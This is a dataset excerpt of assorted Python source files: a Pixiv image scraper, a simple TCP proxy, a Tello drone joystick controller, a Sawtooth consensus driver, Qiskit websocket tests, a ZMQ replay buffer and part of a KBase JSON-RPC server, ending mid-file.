source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
app.py
|
from urllib import request
import threading
import queue
import re
import os
import webbrowser
import sys
import subprocess
class pixiv:
def __init__(self):
self.folder = 'res'
self.web_coding = 'utf-8'
self.root = os.path.dirname(os.path.abspath(__file__))
self.DefaultHeader = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "",
"Connection": "keep-alive",
}
self.data_low = []
self.num = 0
def _http(self, url, headers, Obj=False):
mok = request.urlopen
res = mok(request.Request(url, headers=headers, method='GET'))
if Obj:
return res
return res.read().decode(self.web_coding, "ignore")
def data_image(self, url_id):
_header = self.DefaultHeader.copy()
_header["Referer"] = "https://www.pixiv.net/member_illust.php?mode=medium&illust_id={}".format(url_id)
_url_data = "https://www.pixiv.net/touch/ajax/illust/details?illust_id={}".format(url_id)
_data_details = self._http(_url_data, _header)
data_url = self.sort_data(re.findall('"url_big":"[^"]*"', _data_details))
data_uid = str(str(str(re.findall('"user_id":"[^"]*"', _data_details)[0]).split(':', 1)[-1]).strip('"'))
return data_url, _header, data_uid
def sort_data(self, data):
_data = []
for item in data:
if item not in _data:
_data.append(item)
return [str(str(item).replace('\\', '').split(':', 1)[-1]).strip('"') for item in _data]
def get_item(self, UserID=None):
if not UserID:
UserID = 'https://www.pixiv.net/ranking.php?mode=male'
if '://' in str(UserID):
Mode_ID = False
else:
Mode_ID = True
if Mode_ID:
_url = "https://www.pixiv.net/ajax/user/{}/profile/all".format(str(UserID))
page = self._http(_url, self.DefaultHeader, True)
if page.code != 200:
raise Exception("Pixiv Page:", page.code)
_data = re.findall('"[0-9]+":null', page.read().decode(self.web_coding, "ignore"))
self.data_low = [str(str(item).split(":")[0]).strip('"') for item in _data if ':null' in str(item)]
else:
page = self._http(UserID, self.DefaultHeader, True)
if page.code != 200:
raise Exception("Pixiv Page:", page.code)
_data = re.findall('data-src="[^"]*"', page.read().decode(self.web_coding, "ignore"))
self.data_low = [str(str(str(str(str(item).split("=", 1)[-1]).strip('"')).rsplit('/', 1)[-1]).split('_')[0]) for item in _data if '/img-master/img/' in str(item)]
self.fliter_item()
def fliter_item(self):
folder = os.path.join(self.root, self.folder)
if not os.path.exists(folder):
return None
_split = "_"
_exist = {}.fromkeys([str(str(item).split(_split)[1]) for item in os.listdir(folder) if _split in item]).keys()
print("Exist Item:", len(_exist))
for _item in self.data_low.copy():
if _item in _exist:
self.data_low.remove(_item)
def get_data_by_item(self, item):
data = self.data_image(item)
for data_url in data[0]:
image = self._http(data_url, data[1], True)
if image.code != 200:
raise Exception("200: [{} | {}]".format(image.code, data[0]))
self.write(str("{}_{}").format(str(data[2]), str(str(data_url).rsplit('/', 1)[-1])), image.read())
def get_data(self, data_list=None):
if not data_list:
data_list = self.data_low
for item in data_list:
self.get_data_by_item(item)
print("\nTotal Image: ", self.num)
def write(self, name, data):
folder = os.path.join(self.root, self.folder)
if not os.path.exists(folder):
os.mkdir(folder)
file = os.path.join(folder, str(name))
fp = open(file, 'wb')
fp.write(data)
fp.close()
self.num += 1
print("200: [ OK | {} ]".format(file))
def add_queue(self, _queue, data_list=None):
for item in data_list:
_item = str(item).strip()
if item and _item:
_queue.put(_item)
def multi_data(self, data_list=None, jumlah=25):
if not data_list:
data_list = self.data_low
print("New Item:", len(data_list), '/', sys.argv[1])
# print(sys.argv[1])
_threads = []
_queue = queue.Queue(maxsize=jumlah)
task_main = threading.Thread(target=self.add_queue, args=(_queue, data_list))
task_main.setName("TaskMain")
task_main.setDaemon(True)
task_main.start()
while _queue.qsize() > 0:
if len(_threads) >= jumlah:
for _item in _threads.copy():
if not _item.is_alive():
_threads.remove(_item)
continue
item = _queue.get()
task = threading.Thread(target=self.get_data_by_item, args=(item,))
task.setDaemon(True)
task.start()
_threads.append(task)
for _task in _threads:
_task.join()
print("\nTotal Image: ", self.num)
if len(sys.argv) == 2:
imgdir = sys.argv[1]
else:
print(f'usage: {sys.argv[0]} [ilustid]')
exit(2)
if __name__ == '__main__':
try:
task = os.sys.argv[1]
except: # pylint: disable=W0702
task = None
p = pixiv()
p.get_item(task)
p.multi_data(jumlah=25)
subprocess.call('python galer.py', shell=True) # nosec
print("local viewer saved > gallery.html")
# title=os.getcwd()
# webbrowser.open_new_tab(title+"/gallery.html") ffs idiot
|
proxy_server.py
|
#!/usr/bin/env python
import socket
import multiprocessing
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
def handle_conn(conn, addr):
print("Connected by", addr)
with socket.create_connection(("www.google.com", 80)) as goog:
while True:
data = conn.recv(BUFFER_SIZE)
if not data:
break
goog.send(data)
while True:
data = goog.recv(BUFFER_SIZE)
if not data:
break
conn.send(data)
conn.close()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
while True:
conn, addr = s.accept()
p = multiprocessing.Process(target=handle_conn, args=(conn, addr))
p.daemon = True
p.start()
print(p)
|
joy.py
|
"""
Copyright 2020 Aircomm
SPDX-License-Identifier: MIT
Author: Giovanni Grieco <giovanni@grieco.dev>
"""
import collections
import time
import os
from threading import Thread
from scapy import sendrecv
from scapy.layers.inet import IP, UDP
from scapy.packet import Raw
"""
Importing SDL2 in Windows could lead to an ImportError if DLL is not found.
Let's force it to search in the current directory.
"""
if os.name == 'nt':
os.environ['PYSDL2_DLL_PATH'] = os.curdir
import sdl2
import sdl2.ext
class JoystickController:
"""
Control your DJI Tello drone using your Joystick, directly from your PC.
Be sure that networking is already setup and the drone is reachable.
"""
def __init__(self):
"""
Initialize useful constants and routing mapping to setup controller actions.
"""
self._running = True
self._command_queue = collections.deque()
###
# You may want to customize the constants and button mapping below
# to suit your specific needs and Joystick characteristics.
###
self._joystick = self._init_joystick()
self._AXIS_DEAD = 2500
self._AXIS_MAX_VAL = 32767
self._axis_state = {
'roll': 0,
'quota': 0,
'yaw': 0,
'pitch': 0
}
self._event_map = {
'SELECT': self._land,
'START': self._takeoff,
'A': self._emergency_land,
'Y': self._command,
'LEFT_X': self._set_roll,
'LEFT_Y': self._set_pitch,
'RIGHT_X': self._set_yaw,
'RIGHT_Y': self._set_quota
}
self._button_map = ('A', 'B', 'X', 'Y', 'LB', 'RB', 'SELECT', 'START', 'JL', 'JR')
self._axis_map = ('LEFT_X', 'LEFT_Y', 'LT', 'RIGHT_X', 'RIGHT_Y', 'RT')
print(f'Connected to {sdl2.SDL_JoystickName(self._joystick).decode()}')
def run(self):
"""
Main runtime procedure.
Manage threads, an empty loop and shutdown procedure in case of program termination.
"""
threads = (
Thread(target=self._receive_command_loop, daemon=True),
Thread(target=self._send_command_loop, daemon=False),
)
for t in threads:
t.start()
self._run_loop()
# if we exit from the run loop for some reason, shutdown
self._command_queue.clear()
self._land()
for t in threads:
t.join()
@staticmethod
def _init_joystick():
"""
Initialize joystick using SDL library. Note that it is automatically
chosen the first enumerated joystick.
Returns
-------
The SDL Joystick object.
"""
sdl2.SDL_Init(sdl2.SDL_INIT_JOYSTICK)
njoysticks = sdl2.SDL_NumJoysticks()
if njoysticks < 1:
raise RuntimeError(f'No joysticks connected!')
print('Joysticks available:')
for i in range(njoysticks):
joy = sdl2.SDL_JoystickOpen(i)
print(f' - {sdl2.SDL_JoystickName(joy).decode()}')
return sdl2.SDL_JoystickOpen(0)
def _run_loop(self):
"""
Main running loop, just to check and handle interrupt signal.
"""
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self._running = False
def _receive_command_loop(self):
"""
Manage Joystick events and call their mapped function.
"""
while self._running:
for event in sdl2.ext.get_events():
try:
if event.type == sdl2.SDL_JOYBUTTONDOWN:
self._event_map[self._button_map[event.jbutton.button]]()
elif event.type == sdl2.SDL_JOYAXISMOTION:
if abs(event.jaxis.value) > self._AXIS_DEAD:
self._event_map[self._axis_map[event.jaxis.axis]](event.jaxis.value)
except KeyError:
pass
def _send_command_loop(self):
"""
Handle command execution using hard real-time, FCFS-based scheduling policy.
"""
while self._running:
try:
cmd = self._command_queue.pop()
answer = sendrecv.sr1(IP(dst='192.168.10.1') / UDP(dport=8889) / cmd,
verbose=1,
timeout=0.2)
try:
response = answer[Raw].load.decode()
print(f'EXE {cmd}: {response}')
except TypeError:
print(f'EXE {cmd}: unknown')
continue
except IndexError: # nothing to schedule, retry another time
time.sleep(0.5)
continue
def _command(self):
"""
Take control of the DJI Tello.
"""
print('Pressed Command button')
self._command_queue.append('command')
def _land(self, force=False):
"""
Schedule drone landing.
Parameters
----------
force: clear out FCFS queue, in case of absolute necessity.
"""
print('Pressed Land button')
if force:
self._command_queue.clear()
self._command_queue.append('land')
def _emergency_land(self):
"""
Schedule drone emergency landing.
Caution: don't harm the drone!
"""
self._command_queue.clear()
self._command_queue.append('emergency')
def _takeoff(self):
"""
Schedule drone takeoff.
Note: if drone is not taking off, check your battery charge level!
"""
print('Pressed Takeoff button')
self._command_queue.append('takeoff')
def _set_roll(self, raw_val):
"""
Set roll axis value.
"""
val = int(raw_val * 100 / self._AXIS_MAX_VAL)
if self._axis_state['roll'] != val:
self._axis_state['roll'] = val
self._dispatch_axis_update()
def _set_quota(self, raw_val):
"""
Set quota axis value.
"""
val = -int(raw_val * 100 / self._AXIS_MAX_VAL)
if self._axis_state['quota'] != val:
self._axis_state['quota'] = val
self._dispatch_axis_update()
def _set_yaw(self, raw_val):
"""
Set yaw axis value.
"""
val = int(raw_val * 100 / self._AXIS_MAX_VAL)
if self._axis_state['yaw'] != val:
self._axis_state['yaw'] = val
self._dispatch_axis_update()
def _set_pitch(self, raw_val):
"""
Set pitch axis value.
"""
val = -int(raw_val * 100 / self._AXIS_MAX_VAL)
if self._axis_state['pitch'] != val:
self._axis_state['pitch'] = val
self._dispatch_axis_update()
def _dispatch_axis_update(self):
"""
Schedule an update of the pitch-roll-quota-yaw of the drone, tipically
managed using Joystick analog sticks.
"""
# print(f'RC: {self._axis_state}') # Caution: this message is highly frequent
self._command_queue.append(f'rc {self._axis_state["roll"]} '
f'{self._axis_state["pitch"]} '
f'{self._axis_state["quota"]} '
f'{self._axis_state["yaw"]}')
if __name__ == '__main__':
print(f'This is Joy - Copyright 2020 Aircomm')
ctrl = JoystickController()
ctrl.run()
|
zmq_driver.py
|
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
import concurrent
import logging
from queue import Queue
from threading import Thread
from sawtooth_sdk.consensus.driver import Driver
from sawtooth_sdk.consensus.engine import StartupState
from sawtooth_sdk.consensus.engine import PeerMessage
from sawtooth_sdk.consensus.zmq_service import ZmqService
from sawtooth_sdk.consensus import exceptions
from sawtooth_sdk.messaging.stream import Stream
from sawtooth_sdk.protobuf import consensus_pb2
from sawtooth_sdk.protobuf.validator_pb2 import Message
LOGGER = logging.getLogger(__name__)
REGISTER_TIMEOUT = 300
SERVICE_TIMEOUT = 300
class ZmqDriver(Driver):
def __init__(self, engine):
super().__init__(engine)
self._engine = engine
self._stream = None
self._exit = False
self._updates = None
def start(self, endpoint):
self._stream = Stream(endpoint)
startup_state = self._register()
# Validators version 1.1 send startup info with the registration
# response; newer versions will send an activation message with the
# startup info
if startup_state is None:
startup_state = self._wait_until_active()
self._updates = Queue()
driver_thread = Thread(
target=self._driver_loop)
driver_thread.start()
try:
self._engine.start(
self._updates,
ZmqService(
stream=self._stream,
timeout=SERVICE_TIMEOUT),
startup_state)
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught engine exception")
self.stop()
driver_thread.join()
def _driver_loop(self):
try:
future = self._stream.receive()
while True:
if self._exit:
self._engine.stop()
break
try:
message = future.result(1)
future = self._stream.receive()
except concurrent.futures.TimeoutError:
continue
try:
result = self._process(message)
# if message was a ping ignore
if result[0] == Message.PING_REQUEST:
continue
self._updates.put(result)
except exceptions.ReceiveError as err:
LOGGER.warning("%s", err)
continue
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught driver exception")
def stop(self):
self._exit = True
self._engine.stop()
self._stream.close()
def _register(self):
self._stream.wait_for_ready()
request = consensus_pb2.ConsensusRegisterRequest(
name=self._engine.name(),
version=self._engine.version(),
)
for (name, version) in self._engine.additional_protocols():
protocol = request.additional_protocols.add()
protocol.name = name
protocol.version = version
while True:
future = self._stream.send(
message_type=Message.CONSENSUS_REGISTER_REQUEST,
content=request.SerializeToString())
response = consensus_pb2.ConsensusRegisterResponse()
response.ParseFromString(future.result(REGISTER_TIMEOUT).content)
if (
response.status
== consensus_pb2.ConsensusRegisterResponse.NOT_READY
):
continue
if response.status == consensus_pb2.ConsensusRegisterResponse.OK:
if (
response.HasField('chain_head')
and response.HasField('local_peer_info')
):
return StartupState(
response.chain_head,
response.peers,
response.local_peer_info)
return None
raise exceptions.ReceiveError(
'Registration failed with status {}'.format(response.status))
def _wait_until_active(self):
future = self._stream.receive()
while True:
try:
message = future.result(1)
except concurrent.futures.TimeoutError:
continue
if (
message.message_type
== Message.CONSENSUS_NOTIFY_ENGINE_ACTIVATED
):
notification = \
consensus_pb2.ConsensusNotifyEngineActivated()
notification.ParseFromString(message.content)
startup_state = StartupState(
notification.chain_head,
notification.peers,
notification.local_peer_info)
LOGGER.info(
'Received activation message with startup state: %s',
startup_state)
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck()
.SerializeToString())
return startup_state
LOGGER.warning('Received message type %s while waiting for \
activation message', message.message_type)
future = self._stream.receive()
def _process(self, message):
type_tag = message.message_type
if type_tag == Message.CONSENSUS_NOTIFY_PEER_CONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerConnected()
notification.ParseFromString(message.content)
data = notification.peer_info
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_DISCONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerDisconnected()
notification.ParseFromString(message.content)
data = notification.peer_id
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_MESSAGE:
notification = consensus_pb2.ConsensusNotifyPeerMessage()
notification.ParseFromString(message.content)
header = consensus_pb2.ConsensusPeerMessageHeader()
header.ParseFromString(notification.message.header)
peer_message = PeerMessage(
header=header,
header_bytes=notification.message.header,
header_signature=notification.message.header_signature,
content=notification.message.content)
data = peer_message, notification.sender_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_NEW:
notification = consensus_pb2.ConsensusNotifyBlockNew()
notification.ParseFromString(message.content)
data = notification.block
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_VALID:
notification = consensus_pb2.ConsensusNotifyBlockValid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_INVALID:
notification = consensus_pb2.ConsensusNotifyBlockInvalid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_COMMIT:
notification = consensus_pb2.ConsensusNotifyBlockCommit()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_ENGINE_DEACTIVATED:
self.stop()
data = None
elif type_tag == Message.PING_REQUEST:
data = None
else:
raise exceptions.ReceiveError(
'Received unexpected message type: {}'.format(type_tag))
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck().SerializeToString())
return type_tag, data
|
test_websocket_integration.py
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test for the Websocket client integration."""
from unittest import mock
from threading import Thread
from queue import Queue
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.compiler import assemble, transpile
from qiskit.providers import JobTimeoutError
from qiskit.providers.ibmq import least_busy
from qiskit.providers.ibmq.api.clients.websocket import (
WebsocketClient, WebsocketAuthenticationMessage)
from qiskit.providers.ibmq.api.clients import AccountClient
from qiskit.providers.ibmq.ibmqfactory import IBMQFactory
from qiskit.providers.jobstatus import JobStatus
from ...ibmqtestcase import IBMQTestCase
from ...decorators import requires_qe_access, run_on_staging
class TestWebsocketIntegration(IBMQTestCase):
"""Websocket integration tests."""
@classmethod
@requires_qe_access
def _get_provider(cls, qe_token=None, qe_url=None):
"""Helper for getting account credentials."""
ibmq_factory = IBMQFactory()
provider = ibmq_factory.enable_account(qe_token, qe_url)
return provider
def setUp(self):
self.provider = self._get_provider()
self.sim_backend = self.provider.get_backend(simulator=True)
# Create a circuit
qr = QuantumRegister(1)
cr = ClassicalRegister(1)
self.qc1 = QuantumCircuit(qr, cr, name='qc1')
self.qc1.measure(qr[0], cr[0])
# Create a default Qobj using the simulator.
self.circuit = transpile(self.qc1, backend=self.sim_backend)
self.qobj = assemble(self.circuit, backend=self.sim_backend, shots=1)
def test_websockets_simulator(self):
"""Test checking status of a job via websockets for a simulator."""
job = self.sim_backend.run(self.qobj)
# Manually disable the non-websocket polling.
job._api._job_final_status_polling = None
result = job.result()
self.assertEqual(result.status, 'COMPLETED')
@run_on_staging
def test_websockets_device(self, provider):
"""Test checking status of a job via websockets for a device."""
backend = least_busy(provider.backends(simulator=False))
qc = transpile(self.qc1, backend=backend)
qobj = assemble(qc, backend=backend)
job = backend.run(qobj)
# Manually disable the non-websocket polling.
job._api._job_final_status_polling = None
result = job.result()
self.assertTrue(result.success)
def test_websockets_job_final_state(self):
"""Test checking status of a job in a final state via websockets."""
job = self.sim_backend.run(self.qobj)
job._wait_for_completion()
# Manually disable the non-websocket polling.
job._api._job_final_status_polling = None
# Pretend we haven't seen the final status
job._status = JobStatus.RUNNING
job._wait_for_completion()
self.assertIs(job._status, JobStatus.DONE)
def test_websockets_retry_bad_url(self):
"""Test http retry after websocket error due to an invalid URL."""
job = self.sim_backend.run(self.qobj)
saved_websocket_url = job._api.client_ws.websocket_url
try:
# Use fake websocket address.
job._api.client_ws.websocket_url = 'wss://wss.localhost'
# _wait_for_completion() should retry with http successfully
# after getting websockets error.
job._wait_for_completion()
finally:
job._api.client_ws.websocket_url = saved_websocket_url
self.assertIs(job._status, JobStatus.DONE)
@mock.patch.object(WebsocketClient, '_authentication_message',
return_value=WebsocketAuthenticationMessage(
type_='authentication', data='phantom_token'))
def test_websockets_retry_bad_auth(self, _):
"""Test http retry after websocket error due to a failed authentication."""
job = self.sim_backend.run(self.qobj)
with mock.patch.object(AccountClient, 'job_status',
side_effect=job._api.job_status) as mocked_wait:
job._wait_for_completion()
self.assertIs(job._status, JobStatus.DONE)
mocked_wait.assert_called_with(job.job_id())
def test_websockets_retry_connection_closed(self):
"""Test http retry after websocket error due to closed connection."""
def _job_status_side_effect(*args, **kwargs):
"""Side effect function to restore job ID"""
# pylint: disable=unused-argument
job._job_id = saved_job_id
return saved_job_status(saved_job_id)
job = self.sim_backend.run(self.qobj)
# Save the originals.
saved_job_id = job._job_id
saved_job_status = job._api.job_status
# Use bad job ID to fail the status retrieval.
job._job_id = '12345'
# job.result() should retry with http successfully after getting websockets error.
with mock.patch.object(AccountClient, 'job_status',
side_effect=_job_status_side_effect):
job._wait_for_completion()
self.assertIs(job._status, JobStatus.DONE)
def test_websockets_timeout(self):
"""Test timeout checking status of a job via websockets."""
qc = transpile(self.qc1, backend=self.sim_backend)
qobj = assemble(qc, backend=self.sim_backend, shots=2048)
job = self.sim_backend.run(qobj)
with self.assertRaises(JobTimeoutError):
job.result(timeout=0.1)
def test_websockets_multi_job(self):
"""Test checking status of multiple jobs in parallel via websockets."""
def _run_job_get_result(q):
job = self.sim_backend.run(self.qobj)
# Manually disable the non-websocket polling.
job._api._job_final_status_polling = None
job._wait_for_completion()
if job._status is not JobStatus.DONE:
q.put(False)
max_threads = 2
result_q = Queue()
job_threads = []
for i in range(max_threads):
job_thread = Thread(target=_run_job_get_result, args=(result_q,),
name="job_result_{}".format(i), daemon=True)
job_thread.start()
job_threads.append(job_thread)
for job_thread in job_threads:
job_thread.join()
self.assertTrue(result_q.empty())
|
detectortrainingdatabuffer.py
|
import argparse as argparse
import logging
from tempfile import TemporaryDirectory
from threading import Thread
import msgpack
import zmq
from dpu_utils.utils import RichPath, run_and_debug
from buglab.utils.logging import MetricProvider, configure_logging
from buglab.utils.msgpackutils import load_all_msgpack_l_gz
from buglab.utils.replaybuffer import ReplayBuffer
LOGGER = logging.getLogger(__name__)
metric_provider = MetricProvider("DetectorTrainingDataBuffer")
def hydrate_replay_buffer(replay_buffer, path):
for sample in load_all_msgpack_l_gz(
RichPath.create(path),
shuffle=True,
):
replay_buffer.add(sample)
def connect_buffer_to_publisher(replay_buffer: ReplayBuffer, pipeline_address: str):
context = zmq.Context.instance()
subscriber = context.socket(zmq.SUB)
subscriber.connect(pipeline_address)
subscriber.setsockopt_string(zmq.SUBSCRIBE, "")
message_counter = metric_provider.new_counter("incoming_messages")
graph_counter = metric_provider.new_counter("incoming_graphs")
delay_measure = metric_provider.new_latency_measure("incoming_latency")
while True:
with delay_measure:
msg = msgpack.loads(subscriber.recv())
message_counter.inc()
for graph_data, bug_prob in msg["rewrites"].values():
if graph_data is not None:
replay_buffer.add(graph_data)
graph_counter.inc()
def run(arguments):
LOGGER.info("Run args: %s", arguments)
# Create the replay buffer and hydrate it with initial data
tmp = TemporaryDirectory()
replay_gauge = metric_provider.new_gauge("replay_buffer_incoming_queue")
replay_buffer = ReplayBuffer(backing_dir=tmp.name, gauge=replay_gauge, ttl=arguments.sample_ttl)
hydration_thread = Thread(
target=lambda: hydrate_replay_buffer(replay_buffer, args.initial_data_hydration_path),
name="replay_buffer_hydration_thread",
daemon=True,
)
hydration_thread.start()
# Create a thread that subscribes to the data generating pipeline and updates itself
buffer_subscription_thread = Thread(
target=lambda: connect_buffer_to_publisher(replay_buffer, arguments.data_pipeline_address),
name="data_pipeline_to_replay_buffer_thread",
daemon=True,
)
buffer_subscription_thread.start()
context = zmq.Context.instance()
socket = context.socket(zmq.REP)
socket.bind(f"tcp://*:{arguments.out_port}")
while True:
next_element = msgpack.dumps(next(replay_buffer.iter_batch(1)))
_ = socket.recv()
socket.send(next_element)
if __name__ == "__main__":
configure_logging()
parser = argparse.ArgumentParser(
description="Subscribe to a data generating pipeline and create a replay-like buffer for training."
)
parser.add_argument(
"initial_data_hydration_path",
type=str,
help="The path to hydrate the replay buffer upon startup.",
)
parser.add_argument(
"--data-pipeline-address",
type=str,
default="tcp://localhost:5558",
help="The zmq address to the data pipeline.",
)
parser.add_argument(
"--out-port",
type=int,
default=5560,
help="The address to the prometheus server.",
)
parser.add_argument(
"--sample-ttl",
type=int,
default=4,
help="The number of times to show each sample to the trainer.",
)
parser.add_argument(
"--debug",
action="store_true",
help="Debug on exception.",
)
parser.add_argument(
"--prometheus-server-port",
type=int,
default=8003,
help="The address to the prometheus server.",
)
parser.add_argument(
"--enable-tracing",
action="store_true",
help="Set to enable recording tracing information.",
)
args = parser.parse_args()
metric_provider.start_server(args.prometheus_server_port)
metric_provider.set_tracing(args.enable_tracing)
run_and_debug(lambda: run(args), args.debug)
|
Coverage_DiscrepancyServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Coverage_Discrepancy.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Coverage_Discrepancy'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Coverage_Discrepancy.Coverage_DiscrepancyImpl import Coverage_Discrepancy # noqa @IgnorePep8
impl_Coverage_Discrepancy = Coverage_Discrepancy(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
